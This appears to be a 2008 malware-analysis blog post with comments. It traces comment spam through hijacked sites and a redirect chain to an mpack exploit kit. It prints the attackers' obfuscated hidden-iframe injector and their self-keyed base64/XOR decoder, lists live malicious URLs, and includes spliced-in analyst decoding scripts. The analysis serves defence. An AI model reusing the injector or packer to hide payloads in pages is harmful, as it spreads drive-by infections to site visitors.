More Blog Spam / updateonline.cc

UPDATE: Starting to tear apart the updateonline.cc guys. Found several interesting URLs:

http://updateonline.cc/winupdate/ice/exe.php has an exe, will analyze soon.
http://updateonline.cc/winupdate/stats/
http://updateonline.cc/winupdate/ice/index.php
http://updateonline.cc/winupdate/mpack9/index.php

So assorted badness, mpack, redirects, iframes, etc.

So we suffered some more blog comment spam on Offensive Computing in the last couple of days. This is basically the same stuff that we’ve seen over and over. So far I haven’t been able to find an EXE coming from this stuff, but that doesn’t mean it’s not there.

I started off by looking at the e-mail address the spammer subscribed from and then looking up all IPs and domains involved. I then analyzed some of the source code on one of the pages, looked at packet captures and did some HTTP tampering.

I’m finding myself wondering why they persist in doing this. Is this simply a vehicle for malware spreading? Do they get money somehow for getting people to hit the various websites? Are they increasing their google rankings by having lots of blogs link to them?

The e-mail address used to post from:

drff09296@averfame.org (the previous “attack” came from qff09296@averfame.org)

Registrant Name:Harold Lani
Registrant Organization:China Construction Bank
Registrant Street1:Mansion, No.31 Guangji Street
Registrant City:Ningbo
Registrant State/Province:
Registrant Postal Code:315000
Registrant Country:CN
Registrant Phone:+86.5747300939
Registrant Email:harold@avereanoia.org

IP address of email domain

78.108.181.22

person: Serge Matveev
address: UPL TELECOM s.r.o
address: Vinohradska 184/2396
address: Prague 3,130 52
address: Czech Republic
phone: +426 267 132 361
phone: +420 267 132 102
nic-hdl: SM9797-RIPE
changed: serge@upl.cz 20080215

IP address they hit the web server from (the previous “attack” was 212.227.118.40 as well)

212.227.118.40

Name: Achim Weiss
Address: Erbprinzenstr. 4 - 12
Pcode: 76133
City: Karlsruhe
Country: DE
Name: Eric Schaetzlein
Address: Schlund+Partner AG
Address: Brauerstr. 48
Pcode: 76135
City: Karlsruhe
Country: DE
Phone: +49 721 91374 0
Fax: +49 721 91374 215
Email: hostmaster@schlund.de

A bunch of URLs are posted in the spam blog comments, but really only two domains. I've posted the domain info after the first two.

http://www.daolao.ru/Confucius/Pound/it/world/negozi_abbigliamento_ravenna/negozi_abbigliamento_ravenna.htm
domain: DAOLAO.RU
type: CORPORATE
nserver: ns.masterhost.ru.
nserver: ns1.masterhost.ru.
nserver: ns2.masterhost.ru.
phone: +7 095 0000000
e-mail: yukan@tsinet.ru

netname: MASTERHOST
descr: Masterhost.ru is a hosting and technical support organization.
country: RU
notify: noc@masterhost.ru
changed: caspy@masterhost.ru 20030507
address: Lyalin lane 3, bld 3
address: 105062 Moscow
address: Russia
phone: +7 495 7729720
fax-no: +7 495 7729723

http://www.economy-pmr.org/giic/video_lesbica_asiatica_gratis/world/video_lesbica_asiatica_gratis.htm

91.196.0.85
Registrant Name:Makruha Igor N.
Registrant Organization:Economy
Registrant Street1:Tiraspol, Sverdlova
Registrant City:Tiraspol
Registrant State/Province:Tiraspol
Registrant Postal Code:mdx005
Registrant Country:MD
Registrant Phone:+373.93224
Registrant Email:pom@economy.idknet.com

org-name: HostBizUa Data Center
address: Polarna st.15 , 3 fw.
address: Ukraine, 04201 Kyiv
phone: +380(44) 5017659
fax-no: +380(44) 5017659
e-mail: support@hostbizua.com
abuse-mailbox: abuse@hostbizua.com

These are the rest of the URLs:
http://www.economy-pmr.org/giic/assicurazione_su_imbarcazioni/to/assicurazione_su_imbarcazioni.html
http://www.daolao.ru/Confucius/Pound/it/hotel_provincia_di_rovigo/verso/page_hotel_provincia_di_rovigo.html
http://www.economy-pmr.org/giic/antivirus_scansione_online.html
http://www.daolao.ru/Confucius/Pound/it/montaggio_gru_edilizia.htm
http://www.economy-pmr.org/giic/world/magnolia_negrita/index_magnolia_negrita.html
http://www.daolao.ru/Confucius/Pound/it/edilizia_pubblica/index_edilizia_pubblica.html
http://www.economy-pmr.org/giic/antivirus_scansione_online.html
http://www.daolao.ru/Confucius/Pound/it/ater_provincia_roma/page_ater_provincia_roma.html
http://www.economy-pmr.org/giic/incontro_privati_annuncio_personali/top/incontro_privati_annuncio_personali.htm
http://www.daolao.ru/Confucius/Pound/it/albergo_hotel_avellino/albergo_hotel_avellino.htm
http://www.economy-pmr.org/giic/city/cucina_cinese_ricetta/index_cucina_cinese_ricetta.html
http://www.daolao.ru/Confucius/Pound/it/test_colesterolo.html
http://www.economy-pmr.org/giic/news/annuncio_hard_sicilia/annuncio_hard_sicilia.htm
http://www.daolao.ru/Confucius/Pound/it/istruzioni_ricarica_cartuccia_epson/nix/page_istruzioni_ricarica_cartuccia_epson.html
http://www.economy-pmr.org/giic/agriturismo_guidonia/italia/agriturismo_guidonia.html
http://www.daolao.ru/Confucius/Pound/it/lol/video_sesso_scaricare_gratis/index_video_sesso_scaricare_gratis.htm
http://www.economy-pmr.org/giic/agriturismo_guidonia/italia/agriturismo_guidonia.html

So we dissected the source of the first page and found several points of interest:

Some google ad action?

    <!-- google_ad_section_start -->
    <div class='post hentry'>
    <a name='6489624055325086262'>

Can tell if we are using wget / links

    <!-- skip links for text browsers -->
    <span id='skiplinks' style='display:none;'>

And again with the iframe stuff broken up to make it harder to find:


    // the tag name and attribute names are assembled from fragments, so a grep for "iframe" or "src" finds nothing
    var x = "rame";
    var y = "i" + "f";
    var el = document.createElement(y + x);
    el.setAttribute("width", 1);
    el.setAttribute("height", 1);
    el.setAttribute("s" + "rc", p);
    el.setAttribute("marg" + "inwidth", 0);
    el.setAttribute("marg" + "inheight", 0);
    el.setAttribute("scr" + "olling", "no");
    el.setAttribute("f" + "rameborder", "0");

Now comes the really nasty part. This is the content that goes into the iframe. The first section here is a decoder which generates the url out of the char encoded numbers. Then come the char encoded characters which make up the true URL:

    var Counter = (function(name)
    {
        var cooks = document.cookie.split(";");
        for (var i = 0; i 

Delchi and famousjs did a quick decode of the numbers and came up with the following:


104, 116, 116, 112, 58, 47, 47, 109, 121, 98, 101, 115, 116, 99, 111, 117, 110, 116, 101, 114, 46, 110, 101, 116, 47, 112, 114, 111, 103, 115, 116, 97, 116, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 63, 85, 110, 105, 113, 67, 111, 111, 107, 61  == http://mybestcounter.net/progstats/index.php?UniqCook=

38, 100, 114, 119, 61, 104, 116, 116, 112, 37, 51, 65, 37, 50, 70, 37, 50, 70, 119, 119, 119, 46, 100, 97, 111, 108, 97, 111, 46, 114, 117, 37, 50, 70, 67, 111, 110, 102, 117, 99, 105, 117, 115, 37, 50, 70, 80, 111, 117, 110, 100, 37, 50, 70, 105, 116  == &drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit
    (URL-decoded: &drw=http://www.daolao.ru/Confucius/Pound/it)
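The hand decode above can be automated. As an added example (not code from the post or from the spammers' pages), the following scans a script for comma-separated runs of numbers, decodes each run as character codes, URL-decodes the result and lists the URLs it finds. The SAMPLE_SCRIPT wrapper and its variable names are constructed; the two number lists inside it are the ones quoted above.

```javascript
// Added example: locate char-code arrays in a script and recover the strings/URLs.

// Constructed script fragment embedding the two number lists quoted in the post.
const SAMPLE_SCRIPT = `
var u = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 109, 121, 98, 101, 115, 116,
  99, 111, 117, 110, 116, 101, 114, 46, 110, 101, 116, 47, 112, 114, 111, 103, 115, 116,
  97, 116, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 63, 85, 110, 105, 113,
  67, 111, 111, 107, 61);
var d = String.fromCharCode(38, 100, 114, 119, 61, 104, 116, 116, 112, 37, 51, 65, 37, 50,
  70, 37, 50, 70, 119, 119, 119, 46, 100, 97, 111, 108, 97, 111, 46, 114, 117, 37, 50, 70,
  67, 111, 110, 102, 117, 99, 105, 117, 115, 37, 50, 70, 80, 111, 117, 110, 100, 37, 50,
  70, 105, 116);
var sizes = [1, 2, 3];
`;

// A "run" is at least four comma-separated 1-3 digit numbers (whitespace/newlines allowed).
const RUN_RE = /(?:\d{1,3}\s*,\s*){3,}\d{1,3}/g;
// URLs inside decoded text; stops at whitespace, quotes, angle brackets or '&'.
const URL_RE = /https?:\/\/[^\s"'<>&]+/g;

// Decode one run; reject runs that are not all printable ASCII (unlikely to be text).
function decodeCharCodeRun(run) {
  const codes = run.split(",").map((s) => Number(s.trim()));
  if (codes.some((c) => !Number.isInteger(c) || c < 32 || c > 126)) return null;
  return String.fromCharCode(...codes);
}

// Every decodable run in the script, in order of appearance.
function extractCharCodeStrings(script) {
  return (script.match(RUN_RE) || []).map(decodeCharCodeRun).filter((s) => s !== null);
}

// decodeURIComponent throws on malformed %-sequences; fall back to the raw text.
function safeUrlDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Decoded strings plus the distinct URLs found in their URL-decoded form.
function analyze(script) {
  const strings = extractCharCodeStrings(script);
  const urls = [];
  for (const s of strings) {
    for (const u of safeUrlDecode(s).match(URL_RE) || []) {
      if (!urls.includes(u)) urls.push(u);
    }
  }
  return { strings, urls };
}

console.log(analyze(SAMPLE_SCRIPT));
```

The printable-ASCII filter is what keeps `[1, 2, 3]`-style size arrays out of the output; loosen it if a sample encodes non-ASCII text.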


Then begins a chain of redirections, so that you end up hitting a variety of sites:

1.) http://mybestcounter.net/progstats/index.php?UniqCook=1&referer=&drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit 

2.) http://www.daolao.ru/Confucius/Pound/it/feed-ico.png 

3.) http://updateonline.cc/progframe.php?dop1=1 

4.) http://x-globstat.cc/adsview/a63?tip=user 

5.) http://bid-assist.org/inst/indedx.php?id=002 

6.) http://www.climbingthewall.info/d/wm017/counter21.php 

7.) http://prolnx.info/lc1008.html 


The mybestcounter.net page sends the browser to updateonline.cc and sets a cookie (packet capture):

GET /progstats/index.php?UniqCook=0&referer=&drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit HTTP/1.1
Host: mybestcounter.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.daolao.ru/Confucius/Pound/it/albergo_hotel_avellino/albergo_hotel_avellino.htm

HTTP/1.1 302 Found
Date: Sat, 15 Mar 2008 00:29:35 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: CounterUniq=1; expires=Sun, 16-Mar-2008 00:29:35 GMT
Location: http://updateonline.cc/progframe.php?dop1=1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

0
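The 302-plus-cookie hop above can be reconstructed from a capture without replaying it against the live sites. As an added example (not the post's own tooling), the following parses raw HTTP responses, walks the Location chain, and collects the Set-Cookie values and the iframe targets on the final page. The CAPTURED map is constructed: its first entry mirrors the headers quoted above, and the second body is a stand-in for the updateonline.cc page built from the four URLs in steps 4 to 7.

```javascript
// Added example: walk a redirect chain from captured responses.

// Constructed responses keyed by request URL.
const CAPTURED = {
  "http://mybestcounter.net/progstats/index.php?UniqCook=0&referer=&drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit":
    "HTTP/1.1 302 Found\r\n" +
    "Server: Apache/1.3.37 (Unix) PHP/5.2.1\r\n" +
    "Set-Cookie: CounterUniq=1; expires=Sun, 16-Mar-2008 00:29:35 GMT\r\n" +
    "Location: http://updateonline.cc/progframe.php?dop1=1\r\n" +
    "Content-Type: text/html\r\n\r\n0\r\n",
  "http://updateonline.cc/progframe.php?dop1=1":
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" +
    "<html><body>" +
    "<iframe src='http://x-globstat.cc/adsview/a63?tip=user' width=1 height=1></iframe>" +
    "<iframe src=\"http://bid-assist.org/inst/indedx.php?id=002\"></iframe>" +
    "<iframe src=http://www.climbingthewall.info/d/wm017/counter21.php></iframe>" +
    "<iframe src='http://prolnx.info/lc1008.html'></iframe>" +
    "</body></html>",
};

// Split a raw response into status code, a lower-cased multi-valued header map, and body.
function parseResponse(raw) {
  const sep = raw.search(/\r?\n\r?\n/);
  const head = sep < 0 ? raw : raw.slice(0, sep);
  const body = sep < 0 ? "" : raw.slice(sep).replace(/^\r?\n\r?\n/, "");
  const lines = head.split(/\r?\n/);
  const statusMatch = /^HTTP\/\d\.\d\s+(\d{3})/.exec(lines[0]);
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[name] = (headers[name] || []).concat(value);
  }
  return { status: statusMatch ? Number(statusMatch[1]) : null, headers, body };
}

// Pull iframe src targets (quoted or bare) out of an HTML body.
function iframeTargets(html) {
  const targets = [];
  for (const m of html.matchAll(/<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi)) {
    targets.push(m[1]);
  }
  return targets;
}

// Follow Location headers through the captured responses. Stops at a non-3xx
// response, at a URL with no capture, or after maxHops (guards against loops).
function followRedirects(startUrl, responses, maxHops = 10) {
  const hops = [];
  const cookies = [];
  let iframes = [];
  let url = startUrl;
  for (let i = 0; i < maxHops && url; i++) {
    const raw = responses[url];
    if (!raw) { hops.push({ url, status: null }); break; }
    const res = parseResponse(raw);
    hops.push({ url, status: res.status });
    for (const c of res.headers["set-cookie"] || []) cookies.push(c.split(";")[0].trim());
    if (res.status >= 300 && res.status < 400 && res.headers.location) {
      url = new URL(res.headers.location[0], url).href; // resolves relative Locations too
    } else {
      iframes = iframeTargets(res.body);
      url = null;
    }
  }
  return { hops, cookies, iframes };
}

function demo() {
  return followRedirects(Object.keys(CAPTURED)[0], CAPTURED);
}

console.log(JSON.stringify(demo(), null, 2));
```

Feeding it the full set of responses from a pcap gives the chain in steps 1 to 7 as data rather than as something you have to click through in a VM.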

The response to the updateonline.cc GET links to the next 4 pages in plain iframes:

GET /progframe.php?dop1=1 HTTP/1.1
Host: updateonline.cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.daolao.ru/Confucius/Pound/it/albergo_hotel_avellino/albergo_hotel_avellino.htm

HTTP/1.1 200 OK
Date: Sat, 15 Mar 2008 00:29:36 GMT
Server: Apache/2.0.52 (CentOS)
Content-Length: 356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


Domain info for each of them:

___________________________________________________________________

mybestcounter.net.
78.108.181.22

DOMAIN INFO:

Scott Dobson        (angry.scots@yahoo.com)
    Huangpu Road, 20
    Shanghai
    Shanghai,200080
    CN
    Tel. +86.2163248383
    
        ns2.fizot.com
        ns1.fizot.com

NETBLOCK INFO:

inetnum:        78.108.180.0 - 78.108.183.255
netname:        UPL-NET-CUSTOMERS
descr:          UPL Telecom
country:        CZ
changed:        serge@upl.cz 20071227
person:         Serge Matveev
address:        UPL TELECOM s.r.o
address:        Vinohradska 184/2396
address:        Prague 3,130 52
address:        Czech Republic
phone:          +426 267 132 361
phone:          +420 267 132 102

___________________________________________________________________

x-globstat.cc
124.217.230.178

DOMAIN INFO:

 PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676
    

NETBLOCK INFO:

    netname:      PIRADIUS-NET
    country:      MY
    e-mail:       abuse@piradius.net
    address:      PIRADIUS NET
    address:      14 Robinson Road #13-00
    address:      Far East Finance Building
    address:      Singapore 048545
    phone:        +603 8318 6932
    fax-no:       +603 8318 6932
    country:      SG
    changed:      admin@piradius.net 20071003

___________________________________________________________________
bid-assist.org
202.83.212.250

DOMAIN INFO:

Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:contact@privacyprotect.org


NETBLOCK INFO:

inetnum:      202.83.192.0 - 202.83.223.255
netname:      SINGTEL-HK
descr:        Singtel Hong Kong Limited
descr:        Unit 2519-2530
descr:        11 On Lai Street
descr:        Corporation Park
descr:        Shatin
country:      HK

person:       Expan Hostmaster
nic-hdl:      EH51-AP
e-mail:       expanhk@singtel.com
address:      28/F, Mega-iAdvantage Building,
address:      ChaiWan
phone:        +852-3105-1688
fax-no:       +852-3105-9888
country:      HK
changed:      mingkit@singtel.com 20030612
person:       Ghazali Maon
address:      Telepark
address:      5 Tampines Central 6
address:      #07-03
address:      Singapore 529482
country:      SG
phone:        +65-7808001
fax-no:       +65-7882931
fax-no:       +65-7883462
e-mail:       ghaz@singtel.com
changed:      ghaz@singtel.com 20010821
___________________________________________________________________

www.climbingthewall.info
85.255.113.166


DOMAIN INFO:

Domain Name:CLIMBINGTHEWALL.INFO
Registrant Name:Geo
Registrant Organization:Geo
Registrant Street1:123 Street
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:RU
Registrant Postal Code:121443
Registrant Country:RU
Registrant Phone:+7.4158875
Registrant Email:thisisgeo@yahoo.com

NETBLOCK INFO:

Netname:        UkrTeleGroup
descr:          UkrTeleGroup Ltd.
admin-c:        UA481-RIPE
tech-c:         UA481-RIPE
country:        UA
org:            ORG-UL25-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-HM-PI-MNT
mnt-lower:      RIPE-NCC-HM-PI-MNT
mnt-by:         UKRTELE-MNT
mnt-routes:     UKRTELE-MNT
mnt-domains:    UKRTELE-MNT
changed:        staff@ukrtelegroup.com.ua 20071101
changed:        hostmaster@ripe.net 20071102
source:         RIPE

organisation:   ORG-UL25-RIPE
org-name:       UkrTeleGroup Ltd.
org-type:       LIR
address:        UkrTeleGroup Ltd.
                Mechnikova 58/5
                65029 Odessa
                Ukraine
phone:          +380487311011
fax-no:         +380487502499
e-mail:         staff@ukrtelegroup.com.ua

person:         Andrew Sotov
address:        Mechnikova 58/5 65029 Odessa
e-mail:         staff@ukrtelegroup.com.ua
abuse-mailbox:  abuse@ukrtelegroup.com.ua
phone:          +380631508855
nic-hdl:        UA481-RIPE
changed:        staff@ukrtelegroup.com.ua 20071016

files

I ran my pcaps through a tool called tcpxtract, which extracts any files from pcaps. All that came out were GIFs, JPGs, PNGs and HTML files, no EXEs. (I ran them all through the unix file command and verified file types.)

So either this particular set isn't pushing any malware or it's hidden somewhere and I didn't trigger it.

V.

Hijacked sites?

So I went ahead and wget-mirrored the sites to dig through them. What it looks like to me, someone correct me if I'm wrong, is that www.economy-pmr.org is the Moldovan government's economy site and that it's just been owned and is being used to propagate this stuff.

So basically anything under www.economy-pmr.org/giic is related to this spam stuff and has iframe redirects to the urls I mentioned before. (I grepped all the html pages and found the same iframe code on basically all of them).

I'm starting to think the daolao.ru site is also just some random Taoism site in Russia that's been hijacked to spread this stuff.

Everything under www.daolao.ru/Confucius/Pound/it is the exact same junk with the same redirects.

definitely mpack

I downloaded a bunch of their mpack files. Also, if you do a Google search for the titles of these Italian-word blogs that iframe-redirect you, you will find hundreds of sites hosting this crap, like "video sesso scaricare gratis" for example.

V

updateonline.cc

The way they get you to go there is that they do an HTTP 302 redirect from mybestcounter.net/progstats/index.php to updateonline.cc/progframe.php?dop1=1

updateonline then has a bunch of iframes that redirect you to 4 other sites.

V.

Valsmith asked me to take a

Valsmith asked me to take a look at a 404 page named lc1008.html that is associated with this.

Here's what I have :


// Inner layer: a base64 decoder over the standard alphabet ('=' is index 64, so
// e3/e4 == 64 means padding and the corresponding byte is not emitted).
function XKdXSY(ii){
    var ks="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var oo="";
    var c1,c2,c3;
    var e1,e2,e3,e4;
    var i=0;
    do{
        e1=ks.indexOf(ii.charAt(i++));
        e2=ks.indexOf(ii.charAt(i++));
        e3=ks.indexOf(ii.charAt(i++));
        e4=ks.indexOf(ii.charAt(i++));
        c1=(e1<<2)|(e2>>4);
        c2=((e2&15)<<4)|(e3>>2);
        c3=((e3&3)<<6)|e4;
        oo=oo+String.fromCharCode(c1);
        if(e3!=64){oo=oo+String.fromCharCode(c2);}
        if(e4!=64){oo=oo+String.fromCharCode(c3);}
    }while(i<ii.length);
    return oo;
}
// Outer layer. Called with one argument, it base64-decodes a1, builds the XOR key
// from its own source text (arguments.callee.toString() with everything but letters
// and digits stripped), calls itself with that key, and document.write()s the result.
// Called with two arguments, it is a plain repeating-key XOR.
function fTomz(a1,b1){
    var i;
    var o="";
    if (!b1) return document.write(fTomz(XKdXSY(a1),arguments.callee.toString().replace(/[^a-zA-Z0-9]/g,"")));
    for (i=0; i<a1.length; i++){
        o+=String.fromCharCode(a1.charCodeAt(i%a1.length)^b1.charCodeAt(i%b1.length));
    }
    return o;
}

Following this was a huge chunk of data, which we believed was base64 encoded. Doing a straight base64 decode of the data didn't reveal anything useful.
I'm not sure why, but I'm not a JavaScript coder, so I'm hoping that someone out here is and can break down how the data is encoded / decoded.

However, I am a sneaky bastard. I inserted a function that writes the output of the javascript to a new window.


// Opens a small pop-up window and writes `content` into its document as HTML.
function writeConsole(content) {
    top.consoleRef = window.open('', 'myconsole',
        'width=350,height=250'
        + ',menubar=0'
        + ',toolbar=1'
        + ',status=0'
        + ',scrollbars=1'
        + ',resizable=1');
    top.consoleRef.document.writeln(
        '<html><head><title>Console</title></head>'
        + '<body bgcolor=white onLoad="self.focus()">'
        + content
        + '</body></html>');
    top.consoleRef.document.close();
}
 

Having done that, I replaced "document.write" with "writeConsole", and then loaded the modified HTML into a browser within my VM victim.

Doing a view source on the new window that popped up ....

<applet code=animan.class name= ....

... and the name was another long string of something encoded not at all in base64.

I'm chewing on that part now.

One word of warning ... although the initial code was decoded and displayed in another window, it still attempted to execute the payload.
While using this method is useful in so far as observing what is going on , do it from a VM.

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

re: Valsmith asked me to take a

Following this was a huge chunk of data, which we believed was base64 encoded. Doing a straight base64 decode of the data didn't reveal anything useful.
I'm not sure why, but I'm not a JavaScript coder, so I'm hoping that someone out here is and can break down how the data is encoded / decoded.

It's not strictly/only base64 encoded, but it does use the same target encoding "alphabet". Note it's not just a "huge chunk of data" but is preceded by a call to its own decoding function (BTW -- the function names are dynamically re-written with each (??) serve of the URL and potentially the encoding used could be changed server-side for each serve as well, though not apparently here).

In your sample, it will be something like "fTomz('WhQeExgMG04g[...]', null);" (the actual data may be different -- I can't be bothered bending my mind around it at the moment).

Having done that, I replaced "document.write" with " writeConsole " , and then loaded the modified html into a browser within my VM victim.

Doing a view source on the new window that popped up ....

   <applet code=animan.class name= ....

... and the name was another long string of something encoded not at all in base64.

I'm chewing on that part now.

That in-script text replacement is the source of your problem -- it has "upset" the decoder, causing it to only partially correctly decode the input data. This "other long string" is, in fact, garbage from a GIGO decoding run.

Note the use of "arguments.callee.toString" and the recursive call to the "outer" decoding layer ("fTomz" in your sample) with the result of "arguments.callee.toString" on itself passed to the "inner" decoding layer ("XKdXSY") as an argument to that function call? The way the inner layer processes the function's source to produce a decoding key for the second (recursed) call to "fTomz" means that it won't (fully) decode correctly if you make any changes to the code. Correct decoding with this code depends on the decoding code being exactly as it is (well, "exactly" once passed through .replace(/[^a-zA-Z0-9]/g,"")).

To extract the decoded script from this kind of encoder/decoder you need some kind of wrapper around the script so you can extract the result of the decoding from the DOM (or its emulator) as the DOM changes, or from modified (logging) write/eval/etc functions (look at Jose Nazario's PhoneyC, the SANS patches to SpiderMonkey maybe (??), etc), or to step through the code in a JS debugger.

I don't have time to decode the next level right now, but it uses the same functions to decode various bits of itself, BUT the structure that's there looks much like one or other of the currently familiar multi-exploit scripts typically seen on these kinds of sites.
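As an added example (not code from either comment, and not the sample's own XKdXSY/fTomz), here is the two-layer scheme described above rebuilt in plain JavaScript, with fTomz-style self-inspection done through the function's name (outerDecode.toString()) instead of arguments.callee.toString() so it also runs in strict mode. innerDecode, innerEncode, xorWithKey, deriveKey, outerDecode, outerDecodeEdited, buildPayload, makeLoggingSink and SAMPLE_STAGE2 are all constructed names and data. It shows the key being the decoder's own sanitised source, the garbage an edited decoder produces, and a logging write() shim that captures the output without touching the decoder.

```javascript
// Added example: the "key is my own source" decoder, its failure under editing,
// and a non-invasive way to capture what it decodes.

const ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

// Inner layer: same arithmetic as the sample's XKdXSY (base64 over ALPHABET).
function innerDecode(ii) {
  let oo = "";
  for (let i = 0; i < ii.length; i += 4) {
    const e1 = ALPHABET.indexOf(ii.charAt(i));
    const e2 = ALPHABET.indexOf(ii.charAt(i + 1));
    const e3 = ALPHABET.indexOf(ii.charAt(i + 2));
    const e4 = ALPHABET.indexOf(ii.charAt(i + 3));
    oo += String.fromCharCode((e1 << 2) | (e2 >> 4));
    if (e3 !== 64) oo += String.fromCharCode(((e2 & 15) << 4) | (e3 >> 2));
    if (e4 !== 64) oo += String.fromCharCode(((e3 & 3) << 6) | e4);
  }
  return oo;
}

// Encoder counterpart, written here only so the example can build its own sample.
function innerEncode(s) {
  let out = "";
  for (let i = 0; i < s.length; i += 3) {
    const c1 = s.charCodeAt(i);
    const c2 = i + 1 < s.length ? s.charCodeAt(i + 1) : -1;
    const c3 = i + 2 < s.length ? s.charCodeAt(i + 2) : -1;
    out += ALPHABET.charAt(c1 >> 2);
    out += ALPHABET.charAt(((c1 & 3) << 4) | (c2 < 0 ? 0 : c2 >> 4));
    out += c2 < 0 ? "=" : ALPHABET.charAt(((c2 & 15) << 2) | (c3 < 0 ? 0 : c3 >> 6));
    out += c3 < 0 ? "=" : ALPHABET.charAt(c3 & 63);
  }
  return out;
}

// Repeating-key XOR, as in the outer layer's loop.
function xorWithKey(data, key) {
  let o = "";
  for (let i = 0; i < data.length; i++) {
    o += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return o;
}

// The key is the decoder's own source with everything but [a-zA-Z0-9] removed.
function deriveKey(fn) {
  return fn.toString().replace(/[^a-zA-Z0-9]/g, "");
}

// Outer layer, mirroring fTomz: with no key it derives one from its own source,
// recurses to XOR the base64-decoded data, and hands the result to sink.write.
function outerDecode(a1, b1, sink) {
  if (!b1) return sink.write(outerDecode(innerDecode(a1), deriveKey(outerDecode), sink));
  return xorWithKey(a1, b1);
}

// Same logic with a different name and parameter name, standing in for the
// edited copy from the post: its sanitised source, hence its key, differs.
function outerDecodeEdited(a1, b1, out) {
  if (!b1) return out.write(outerDecodeEdited(innerDecode(a1), deriveKey(outerDecodeEdited), out));
  return xorWithKey(a1, b1);
}

// Encoding side: XOR with the key the untouched decoder will derive, then base64.
function buildPayload(plaintext, decoder) {
  return innerEncode(xorWithKey(plaintext, deriveKey(decoder)));
}

// Analyst shim: a document-like object whose write() records instead of rendering.
function makeLoggingSink() {
  const writes = [];
  return { writes, write(s) { writes.push(s); return s; } };
}

// Constructed stand-in for the decoded second stage (the post saw an <applet> tag).
const SAMPLE_STAGE2 = "document.write('<applet code=animan.class name=x></applet>');";

function demo() {
  const payload = buildPayload(SAMPLE_STAGE2, outerDecode);
  const good = makeLoggingSink();
  outerDecode(payload, null, good);          // untouched decoder: key matches
  const bad = makeLoggingSink();
  outerDecodeEdited(payload, null, bad);     // edited decoder: key differs, output is garbage
  return { payload, recovered: good.writes[0], tampered: bad.writes[0] };
}

console.log(demo());
```

The sink is the "modified (logging) write" approach the reply mentions: the decoder's source is left exactly as served, so its key stays correct, and nothing it writes reaches a real document, which also avoids the payload running as it did in the pop-up window.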

Re: Valsmith asked me to take a

Whoooops -- in my longer reply I meant to say first, it's probably a fair bet that the fancy decoding of the exploits results in attempted download and execution of http://prolnx.info/lc1008.html (--> Setup_v1008.exe), as does the (ancient!) .ANI exploit included via "anr/us1008.anr" at the top of the lc1008.html page!

If I had a penny...

For every time someone from a former soviet bloc was a pain in my ass; I would have a lot of pennies. :)

I am getting social again, Val, I hope you don't mind if I lurk around here.

-Gaussie